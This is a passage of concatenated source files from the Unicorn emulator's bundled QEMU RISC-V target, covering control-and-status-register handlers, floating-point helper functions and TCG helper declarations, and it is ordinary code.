sstatus_v1_10_mask : sstatus_v1_9_mask); target_ulong newval = (env->mstatus & ~mask) | (val & mask); return write_mstatus(env, CSR_MSTATUS, newval); } static int read_sie(CPURISCVState *env, int csrno, target_ulong *val) { if (riscv_cpu_virt_enabled(env)) { /* Tell the guest the VS bits, shifted to the S bit locations */ *val = (env->mie & env->mideleg & VS_MODE_INTERRUPTS) >> 1; } else { *val = env->mie & env->mideleg; } return 0; } static int write_sie(CPURISCVState *env, int csrno, target_ulong val) { target_ulong newval; if (riscv_cpu_virt_enabled(env)) { /* Shift the guests S bits to VS */ newval = (env->mie & ~VS_MODE_INTERRUPTS) | ((val << 1) & VS_MODE_INTERRUPTS); } else { newval = (env->mie & ~S_MODE_INTERRUPTS) | (val & S_MODE_INTERRUPTS); } return write_mie(env, CSR_MIE, newval); } static int read_stvec(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->stvec; return 0; } static int write_stvec(CPURISCVState *env, int csrno, target_ulong val) { /* bits [1:0] encode mode; 0 = direct, 1 = vectored, 2 >= reserved */ if ((val & 3) < 2) { env->stvec = val; } else { qemu_log_mask(LOG_UNIMP, "CSR_STVEC: reserved mode not supported\n"); } return 0; } static int read_scounteren(CPURISCVState *env, int csrno, target_ulong *val) { if (env->priv_ver < PRIV_VERSION_1_10_0) { return -1; } *val = env->scounteren; return 0; } static int write_scounteren(CPURISCVState *env, int csrno, target_ulong val) { if (env->priv_ver < PRIV_VERSION_1_10_0) { return -1; } env->scounteren = val; return 0; } /* Supervisor Trap Handling */ static int read_sscratch(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->sscratch; return 0; } static int write_sscratch(CPURISCVState *env, int csrno, target_ulong val) { env->sscratch = val; return 0; } static int read_sepc(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->sepc; return 0; } static int write_sepc(CPURISCVState *env, int csrno, target_ulong val) { env->sepc = val; return 0; } static int read_scause(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->scause; return 0; } static int write_scause(CPURISCVState *env, int csrno, target_ulong val) { env->scause = val; return 0; } static int read_sbadaddr(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->sbadaddr; return 0; } static int write_sbadaddr(CPURISCVState *env, int csrno, target_ulong val) { env->sbadaddr = val; return 0; } static int rmw_sip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret; if (riscv_cpu_virt_enabled(env)) { /* Shift the new values to line up with the VS bits */ ret = rmw_mip(env, CSR_MSTATUS, ret_value, new_value << 1, (write_mask & sip_writable_mask) << 1 & env->mideleg); ret &= vsip_writable_mask; ret >>= 1; } else { ret = rmw_mip(env, CSR_MSTATUS, ret_value, new_value, write_mask & env->mideleg & sip_writable_mask); } *ret_value &= env->mideleg; return ret; } /* Supervisor Protection and Translation */ static int read_satp(CPURISCVState *env, int csrno, target_ulong *val) { if (!riscv_feature(env, RISCV_FEATURE_MMU)) { *val = 0; } else if (env->priv_ver >= PRIV_VERSION_1_10_0) { if (env->priv == PRV_S && get_field(env->mstatus, MSTATUS_TVM)) { return -1; } else { *val = env->satp; } } else { *val = env->sptbr; } return 0; } static int write_satp(CPURISCVState *env, int csrno, target_ulong val) { if (!riscv_feature(env, RISCV_FEATURE_MMU)) { return 0; } if (env->priv_ver <= PRIV_VERSION_1_09_1 && (val ^ env->sptbr)) { tlb_flush(env_cpu(env)); env->sptbr 
= val & (((target_ulong) 1 << (TARGET_PHYS_ADDR_SPACE_BITS - PGSHIFT)) - 1); } if (env->priv_ver >= PRIV_VERSION_1_10_0 && validate_vm(env, get_field(val, SATP_MODE)) && ((val ^ env->satp) & (SATP_MODE | SATP_ASID | SATP_PPN))) { if (env->priv == PRV_S && get_field(env->mstatus, MSTATUS_TVM)) { return -1; } else { if((val ^ env->satp) & SATP_ASID) { tlb_flush(env_cpu(env)); } env->satp = val; } } return 0; } /* Hypervisor Extensions */ static int read_hstatus(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hstatus; return 0; } static int write_hstatus(CPURISCVState *env, int csrno, target_ulong val) { env->hstatus = val; return 0; } static int read_hedeleg(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hedeleg; return 0; } static int write_hedeleg(CPURISCVState *env, int csrno, target_ulong val) { env->hedeleg = val; return 0; } static int read_hideleg(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hideleg; return 0; } static int write_hideleg(CPURISCVState *env, int csrno, target_ulong val) { env->hideleg = val; return 0; } static int rmw_hip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret = rmw_mip(env, 0, ret_value, new_value, write_mask & hip_writable_mask); return ret; } static int read_hie(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mie & VS_MODE_INTERRUPTS; return 0; } static int write_hie(CPURISCVState *env, int csrno, target_ulong val) { target_ulong newval = (env->mie & ~VS_MODE_INTERRUPTS) | (val & VS_MODE_INTERRUPTS); return write_mie(env, CSR_MIE, newval); } static int read_hcounteren(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hcounteren; return 0; } static int write_hcounteren(CPURISCVState *env, int csrno, target_ulong val) { env->hcounteren = val; return 0; } static int read_htval(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->htval; return 0; } static int write_htval(CPURISCVState *env, int csrno, target_ulong val) { env->htval = val; return 0; } static int read_htinst(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->htinst; return 0; } static int write_htinst(CPURISCVState *env, int csrno, target_ulong val) { env->htinst = val; return 0; } static int read_hgatp(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->hgatp; return 0; } static int write_hgatp(CPURISCVState *env, int csrno, target_ulong val) { env->hgatp = val; return 0; } static int read_htimedelta(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->rdtime_fn) { return -1; } #if defined(TARGET_RISCV32) *val = env->htimedelta & 0xffffffff; #else *val = env->htimedelta; #endif return 0; } static int write_htimedelta(CPURISCVState *env, int csrno, target_ulong val) { if (!env->rdtime_fn) { return -1; } #if defined(TARGET_RISCV32) env->htimedelta = deposit64(env->htimedelta, 0, 32, (uint64_t)val); #else env->htimedelta = val; #endif return 0; } #if defined(TARGET_RISCV32) static int read_htimedeltah(CPURISCVState *env, int csrno, target_ulong *val) { if (!env->rdtime_fn) { return -1; } *val = env->htimedelta >> 32; return 0; } static int write_htimedeltah(CPURISCVState *env, int csrno, target_ulong val) { if (!env->rdtime_fn) { return -1; } env->htimedelta = deposit64(env->htimedelta, 32, 32, (uint64_t)val); return 0; } #endif /* Virtual CSR Registers */ static int read_vsstatus(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vsstatus; return 0; } static int write_vsstatus(CPURISCVState 
*env, int csrno, target_ulong val) { env->vsstatus = val; return 0; } static int rmw_vsip(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret = rmw_mip(env, 0, ret_value, new_value, write_mask & env->mideleg & vsip_writable_mask); return ret; } static int read_vsie(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mie & env->mideleg & VS_MODE_INTERRUPTS; return 0; } static int write_vsie(CPURISCVState *env, int csrno, target_ulong val) { target_ulong newval = (env->mie & ~env->mideleg) | (val & env->mideleg & MIP_VSSIP); return write_mie(env, CSR_MIE, newval); } static int read_vstvec(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vstvec; return 0; } static int write_vstvec(CPURISCVState *env, int csrno, target_ulong val) { env->vstvec = val; return 0; } static int read_vsscratch(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vsscratch; return 0; } static int write_vsscratch(CPURISCVState *env, int csrno, target_ulong val) { env->vsscratch = val; return 0; } static int read_vsepc(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vsepc; return 0; } static int write_vsepc(CPURISCVState *env, int csrno, target_ulong val) { env->vsepc = val; return 0; } static int read_vscause(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vscause; return 0; } static int write_vscause(CPURISCVState *env, int csrno, target_ulong val) { env->vscause = val; return 0; } static int read_vstval(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vstval; return 0; } static int write_vstval(CPURISCVState *env, int csrno, target_ulong val) { env->vstval = val; return 0; } static int read_vsatp(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->vsatp; return 0; } static int write_vsatp(CPURISCVState *env, int csrno, target_ulong val) { env->vsatp = val; return 0; } static int read_mtval2(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mtval2; return 0; } static int write_mtval2(CPURISCVState *env, int csrno, target_ulong val) { env->mtval2 = val; return 0; } static int read_mtinst(CPURISCVState *env, int csrno, target_ulong *val) { *val = env->mtinst; return 0; } static int write_mtinst(CPURISCVState *env, int csrno, target_ulong val) { env->mtinst = val; return 0; } /* Physical Memory Protection */ static int read_pmpcfg(CPURISCVState *env, int csrno, target_ulong *val) { *val = pmpcfg_csr_read(env, csrno - CSR_PMPCFG0); return 0; } static int write_pmpcfg(CPURISCVState *env, int csrno, target_ulong val) { pmpcfg_csr_write(env, csrno - CSR_PMPCFG0, val); return 0; } static int read_pmpaddr(CPURISCVState *env, int csrno, target_ulong *val) { *val = pmpaddr_csr_read(env, csrno - CSR_PMPADDR0); return 0; } static int write_pmpaddr(CPURISCVState *env, int csrno, target_ulong val) { pmpaddr_csr_write(env, csrno - CSR_PMPADDR0, val); return 0; } /* * riscv_csrrw - read and/or update control and status register * * csrr <-> riscv_csrrw(env, csrno, ret_value, 0, 0); * csrrw <-> riscv_csrrw(env, csrno, ret_value, value, -1); * csrrs <-> riscv_csrrw(env, csrno, ret_value, -1, value); * csrrc <-> riscv_csrrw(env, csrno, ret_value, 0, value); */ int riscv_csrrw(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret; target_ulong old_value; RISCVCPU *cpu = env_archcpu(env); /* check privileges and return -1 if check fails */ int effective_priv = env->priv; int read_only = get_field(csrno, 
0xC00) == 3; if (riscv_has_ext(env, RVH) && env->priv == PRV_S && !riscv_cpu_virt_enabled(env)) { /* * We are in S mode without virtualisation, therefore we are in HS Mode. * Add 1 to the effective privilege level to allow us to access the * Hypervisor CSRs. */ effective_priv++; } if ((write_mask && read_only) || (!env->debugger && (effective_priv < get_field(csrno, 0x300)))) { return -1; } /* ensure the CSR extension is enabled. */ if (!cpu->cfg.ext_icsr) { return -1; } /* check predicate */ if (!csr_ops[csrno].predicate || csr_ops[csrno].predicate(env, csrno) < 0) { return -1; } /* execute combined read/write operation if it exists */ if (csr_ops[csrno].op) { return csr_ops[csrno].op(env, csrno, ret_value, new_value, write_mask); } /* if no accessor exists then return failure */ if (!csr_ops[csrno].read) { return -1; } /* read old value */ ret = csr_ops[csrno].read(env, csrno, &old_value); if (ret < 0) { return ret; } /* write value if writable and write mask set, otherwise drop writes */ if (write_mask) { new_value = (old_value & ~write_mask) | (new_value & write_mask); if (csr_ops[csrno].write) { ret = csr_ops[csrno].write(env, csrno, new_value); if (ret < 0) { return ret; } } } /* return old value */ if (ret_value) { *ret_value = old_value; } return 0; } /* * Debugger support. If not in user mode, set env->debugger before the * riscv_csrrw call and clear it after the call. */ int riscv_csrrw_debug(CPURISCVState *env, int csrno, target_ulong *ret_value, target_ulong new_value, target_ulong write_mask) { int ret; env->debugger = true; ret = riscv_csrrw(env, csrno, ret_value, new_value, write_mask); env->debugger = false; return ret; }
unicorn-2.1.1/qemu/target/riscv/fpu_helper.c
/* * RISC-V FPU Emulation Helpers for QEMU. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "qemu/host-utils.h" #include "exec/exec-all.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" target_ulong riscv_cpu_get_fflags(CPURISCVState *env) { int soft = get_float_exception_flags(&env->fp_status); target_ulong hard = 0; hard |= (soft & float_flag_inexact) ? FPEXC_NX : 0; hard |= (soft & float_flag_underflow) ? 
FPEXC_UF : 0; hard |= (soft & float_flag_overflow) ? FPEXC_OF : 0; hard |= (soft & float_flag_divbyzero) ? FPEXC_DZ : 0; hard |= (soft & float_flag_invalid) ? FPEXC_NV : 0; return hard; } void riscv_cpu_set_fflags(CPURISCVState *env, target_ulong hard) { int soft = 0; soft |= (hard & FPEXC_NX) ? float_flag_inexact : 0; soft |= (hard & FPEXC_UF) ? float_flag_underflow : 0; soft |= (hard & FPEXC_OF) ? float_flag_overflow : 0; soft |= (hard & FPEXC_DZ) ? float_flag_divbyzero : 0; soft |= (hard & FPEXC_NV) ? float_flag_invalid : 0; set_float_exception_flags(soft, &env->fp_status); } void helper_set_rounding_mode(CPURISCVState *env, uint32_t rm) { int softrm; if (rm == 7) { rm = env->frm; } switch (rm) { case 0: softrm = float_round_nearest_even; break; case 1: softrm = float_round_to_zero; break; case 2: softrm = float_round_down; break; case 3: softrm = float_round_up; break; case 4: softrm = float_round_ties_away; break; default: riscv_raise_exception(env, RISCV_EXCP_ILLEGAL_INST, GETPC()); } set_float_rounding_mode(softrm, &env->fp_status); } uint64_t helper_fmadd_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float32_muladd(frs1, frs2, frs3, 0, &env->fp_status); } uint64_t helper_fmadd_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float64_muladd(frs1, frs2, frs3, 0, &env->fp_status); } uint64_t helper_fmsub_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float32_muladd(frs1, frs2, frs3, float_muladd_negate_c, &env->fp_status); } uint64_t helper_fmsub_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float64_muladd(frs1, frs2, frs3, float_muladd_negate_c, &env->fp_status); } uint64_t helper_fnmsub_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float32_muladd(frs1, frs2, frs3, float_muladd_negate_product, &env->fp_status); } uint64_t helper_fnmsub_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float64_muladd(frs1, frs2, frs3, float_muladd_negate_product, &env->fp_status); } uint64_t helper_fnmadd_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float32_muladd(frs1, frs2, frs3, float_muladd_negate_c | float_muladd_negate_product, &env->fp_status); } uint64_t helper_fnmadd_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2, uint64_t frs3) { return float64_muladd(frs1, frs2, frs3, float_muladd_negate_c | float_muladd_negate_product, &env->fp_status); } uint64_t helper_fadd_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_add(frs1, frs2, &env->fp_status); } uint64_t helper_fsub_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_sub(frs1, frs2, &env->fp_status); } uint64_t helper_fmul_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_mul(frs1, frs2, &env->fp_status); } uint64_t helper_fdiv_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_div(frs1, frs2, &env->fp_status); } uint64_t helper_fmin_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_minnum(frs1, frs2, &env->fp_status); } uint64_t helper_fmax_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_maxnum(frs1, frs2, &env->fp_status); } uint64_t helper_fsqrt_s(CPURISCVState *env, uint64_t frs1) { return float32_sqrt(frs1, &env->fp_status); } target_ulong helper_fle_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_le(frs1, frs2, &env->fp_status); } target_ulong helper_flt_s(CPURISCVState *env, uint64_t frs1, uint64_t 
frs2) { return float32_lt(frs1, frs2, &env->fp_status); } target_ulong helper_feq_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float32_eq_quiet(frs1, frs2, &env->fp_status); } target_ulong helper_fcvt_w_s(CPURISCVState *env, uint64_t frs1) { return float32_to_int32(frs1, &env->fp_status); } target_ulong helper_fcvt_wu_s(CPURISCVState *env, uint64_t frs1) { return (int32_t)float32_to_uint32(frs1, &env->fp_status); } #if defined(TARGET_RISCV64) uint64_t helper_fcvt_l_s(CPURISCVState *env, uint64_t frs1) { return float32_to_int64(frs1, &env->fp_status); } uint64_t helper_fcvt_lu_s(CPURISCVState *env, uint64_t frs1) { return float32_to_uint64(frs1, &env->fp_status); } #endif uint64_t helper_fcvt_s_w(CPURISCVState *env, target_ulong rs1) { return int32_to_float32((int32_t)rs1, &env->fp_status); } uint64_t helper_fcvt_s_wu(CPURISCVState *env, target_ulong rs1) { return uint32_to_float32((uint32_t)rs1, &env->fp_status); } #if defined(TARGET_RISCV64) uint64_t helper_fcvt_s_l(CPURISCVState *env, uint64_t rs1) { return int64_to_float32(rs1, &env->fp_status); } uint64_t helper_fcvt_s_lu(CPURISCVState *env, uint64_t rs1) { return uint64_to_float32(rs1, &env->fp_status); } #endif target_ulong helper_fclass_s(uint64_t frs1) { float32 f = frs1; bool sign = float32_is_neg(f); if (float32_is_infinity(f)) { return sign ? 1 << 0 : 1 << 7; } else if (float32_is_zero(f)) { return sign ? 1 << 3 : 1 << 4; } else if (float32_is_zero_or_denormal(f)) { return sign ? 1 << 2 : 1 << 5; } else if (float32_is_any_nan(f)) { float_status s = { 0 }; /* for snan_bit_is_one */ return float32_is_quiet_nan(f, &s) ? 1 << 9 : 1 << 8; } else { return sign ? 1 << 1 : 1 << 6; } } uint64_t helper_fadd_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_add(frs1, frs2, &env->fp_status); } uint64_t helper_fsub_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_sub(frs1, frs2, &env->fp_status); } uint64_t helper_fmul_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_mul(frs1, frs2, &env->fp_status); } uint64_t helper_fdiv_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_div(frs1, frs2, &env->fp_status); } uint64_t helper_fmin_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_minnum(frs1, frs2, &env->fp_status); } uint64_t helper_fmax_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_maxnum(frs1, frs2, &env->fp_status); } uint64_t helper_fcvt_s_d(CPURISCVState *env, uint64_t rs1) { return float64_to_float32(rs1, &env->fp_status); } uint64_t helper_fcvt_d_s(CPURISCVState *env, uint64_t rs1) { return float32_to_float64(rs1, &env->fp_status); } uint64_t helper_fsqrt_d(CPURISCVState *env, uint64_t frs1) { return float64_sqrt(frs1, &env->fp_status); } target_ulong helper_fle_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_le(frs1, frs2, &env->fp_status); } target_ulong helper_flt_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_lt(frs1, frs2, &env->fp_status); } target_ulong helper_feq_d(CPURISCVState *env, uint64_t frs1, uint64_t frs2) { return float64_eq_quiet(frs1, frs2, &env->fp_status); } target_ulong helper_fcvt_w_d(CPURISCVState *env, uint64_t frs1) { return float64_to_int32(frs1, &env->fp_status); } target_ulong helper_fcvt_wu_d(CPURISCVState *env, uint64_t frs1) { return (int32_t)float64_to_uint32(frs1, &env->fp_status); } #if defined(TARGET_RISCV64) uint64_t helper_fcvt_l_d(CPURISCVState *env, uint64_t frs1) { return float64_to_int64(frs1, &env->fp_status); } 
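/*
 * Illustrative note (not part of the original source): the fclass_s and
 * fclass_d helpers in this file return a one-hot value whose set bit index
 * encodes the operand class, following the RISC-V F/D FCLASS encoding:
 *
 *   bit 0: negative infinity    bit 5: positive subnormal
 *   bit 1: negative normal      bit 6: positive normal
 *   bit 2: negative subnormal   bit 7: positive infinity
 *   bit 3: negative zero        bit 8: signaling NaN
 *   bit 4: positive zero        bit 9: quiet NaN
 *
 * For example, helper_fclass_s(0x3f800000) (the single-precision bit
 * pattern of 1.0f, a positive normal) yields 1 << 6, while
 * helper_fclass_s(0xff800000) (negative infinity) yields 1 << 0.
 */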
uint64_t helper_fcvt_lu_d(CPURISCVState *env, uint64_t frs1) { return float64_to_uint64(frs1, &env->fp_status); } #endif uint64_t helper_fcvt_d_w(CPURISCVState *env, target_ulong rs1) { return int32_to_float64((int32_t)rs1, &env->fp_status); } uint64_t helper_fcvt_d_wu(CPURISCVState *env, target_ulong rs1) { return uint32_to_float64((uint32_t)rs1, &env->fp_status); } #if defined(TARGET_RISCV64) uint64_t helper_fcvt_d_l(CPURISCVState *env, uint64_t rs1) { return int64_to_float64(rs1, &env->fp_status); } uint64_t helper_fcvt_d_lu(CPURISCVState *env, uint64_t rs1) { return uint64_to_float64(rs1, &env->fp_status); } #endif target_ulong helper_fclass_d(uint64_t frs1) { float64 f = frs1; bool sign = float64_is_neg(f); if (float64_is_infinity(f)) { return sign ? 1 << 0 : 1 << 7; } else if (float64_is_zero(f)) { return sign ? 1 << 3 : 1 << 4; } else if (float64_is_zero_or_denormal(f)) { return sign ? 1 << 2 : 1 << 5; } else if (float64_is_any_nan(f)) { float_status s = { 0 }; /* for snan_bit_is_one */ return float64_is_quiet_nan(f, &s) ? 1 << 9 : 1 << 8; } else { return sign ? 1 << 1 : 1 << 6; } }
unicorn-2.1.1/qemu/target/riscv/helper.h
DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_1(uc_riscv_exit, void, env) /* Exceptions */ DEF_HELPER_2(raise_exception, noreturn, env, i32) /* Floating Point - rounding mode */ DEF_HELPER_FLAGS_2(set_rounding_mode, TCG_CALL_NO_WG, void, env, i32) /* Floating Point - fused */ DEF_HELPER_FLAGS_4(fmadd_s, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fmadd_d, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fmsub_s, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fmsub_d, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fnmsub_s, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fnmsub_d, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fnmadd_s, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) DEF_HELPER_FLAGS_4(fnmadd_d, TCG_CALL_NO_RWG, i64, env, i64, i64, i64) /* Floating Point - Single Precision */ DEF_HELPER_FLAGS_3(fadd_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fsub_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmul_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fdiv_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmin_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmax_s, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_2(fsqrt_s, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_3(fle_s, TCG_CALL_NO_RWG, tl, env, 
i64, i64) DEF_HELPER_FLAGS_3(flt_s, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_3(feq_s, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_2(fcvt_w_s, TCG_CALL_NO_RWG, tl, env, i64) DEF_HELPER_FLAGS_2(fcvt_wu_s, TCG_CALL_NO_RWG, tl, env, i64) #if defined(TARGET_RISCV64) DEF_HELPER_FLAGS_2(fcvt_l_s, TCG_CALL_NO_RWG, tl, env, i64) DEF_HELPER_FLAGS_2(fcvt_lu_s, TCG_CALL_NO_RWG, tl, env, i64) #endif DEF_HELPER_FLAGS_2(fcvt_s_w, TCG_CALL_NO_RWG, i64, env, tl) DEF_HELPER_FLAGS_2(fcvt_s_wu, TCG_CALL_NO_RWG, i64, env, tl) #if defined(TARGET_RISCV64) DEF_HELPER_FLAGS_2(fcvt_s_l, TCG_CALL_NO_RWG, i64, env, tl) DEF_HELPER_FLAGS_2(fcvt_s_lu, TCG_CALL_NO_RWG, i64, env, tl) #endif DEF_HELPER_FLAGS_1(fclass_s, TCG_CALL_NO_RWG_SE, tl, i64) /* Floating Point - Double Precision */ DEF_HELPER_FLAGS_3(fadd_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fsub_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmul_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fdiv_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmin_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_3(fmax_d, TCG_CALL_NO_RWG, i64, env, i64, i64) DEF_HELPER_FLAGS_2(fcvt_s_d, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_2(fcvt_d_s, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_2(fsqrt_d, TCG_CALL_NO_RWG, i64, env, i64) DEF_HELPER_FLAGS_3(fle_d, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_3(flt_d, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_3(feq_d, TCG_CALL_NO_RWG, tl, env, i64, i64) DEF_HELPER_FLAGS_2(fcvt_w_d, TCG_CALL_NO_RWG, tl, env, i64) DEF_HELPER_FLAGS_2(fcvt_wu_d, TCG_CALL_NO_RWG, tl, env, i64) #if defined(TARGET_RISCV64) DEF_HELPER_FLAGS_2(fcvt_l_d, TCG_CALL_NO_RWG, tl, env, i64) DEF_HELPER_FLAGS_2(fcvt_lu_d, TCG_CALL_NO_RWG, tl, env, i64) #endif DEF_HELPER_FLAGS_2(fcvt_d_w, TCG_CALL_NO_RWG, i64, env, tl) DEF_HELPER_FLAGS_2(fcvt_d_wu, TCG_CALL_NO_RWG, i64, env, tl) #if defined(TARGET_RISCV64) DEF_HELPER_FLAGS_2(fcvt_d_l, TCG_CALL_NO_RWG, i64, env, tl) DEF_HELPER_FLAGS_2(fcvt_d_lu, TCG_CALL_NO_RWG, i64, env, tl) #endif DEF_HELPER_FLAGS_1(fclass_d, TCG_CALL_NO_RWG_SE, tl, i64) /* Special functions */ DEF_HELPER_3(csrrw, tl, env, tl, tl) DEF_HELPER_4(csrrs, tl, env, tl, tl, tl) DEF_HELPER_4(csrrc, tl, env, tl, tl, tl) DEF_HELPER_2(sret, tl, env, tl) DEF_HELPER_2(mret, tl, env, tl) DEF_HELPER_1(wfi, void, env) DEF_HELPER_1(tlb_flush, void, env) 
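/*
 * Note (a sketch of the usual QEMU helper conventions, added for clarity):
 * each DEF_HELPER_n(name, ret, args...) entry above declares the prototype
 * of a C function named helper_<name> and registers its signature with the
 * TCG code generator. Assuming the standard expansion, for instance,
 *
 *   DEF_HELPER_FLAGS_3(fadd_s, TCG_CALL_NO_RWG, i64, env, i64, i64)
 *
 * corresponds to a prototype along the lines of
 *
 *   uint64_t helper_fadd_s(CPURISCVState *env, uint64_t frs1, uint64_t frs2);
 *
 * matching the definition in fpu_helper.c above. The TCG_CALL_NO_* flags
 * are optimization hints: NO_WG / NO_RWG promise that the helper does not
 * write (or read and write) TCG globals such as the guest registers, and a
 * _SE suffix additionally marks the call free of side effects, so the
 * optimizer may reorder or eliminate it.
 */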
unicorn-2.1.1/qemu/target/riscv/insn_trans/
unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_privileged.inc.c
/* * RISC-V translation routines for the RISC-V privileged instructions. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. 
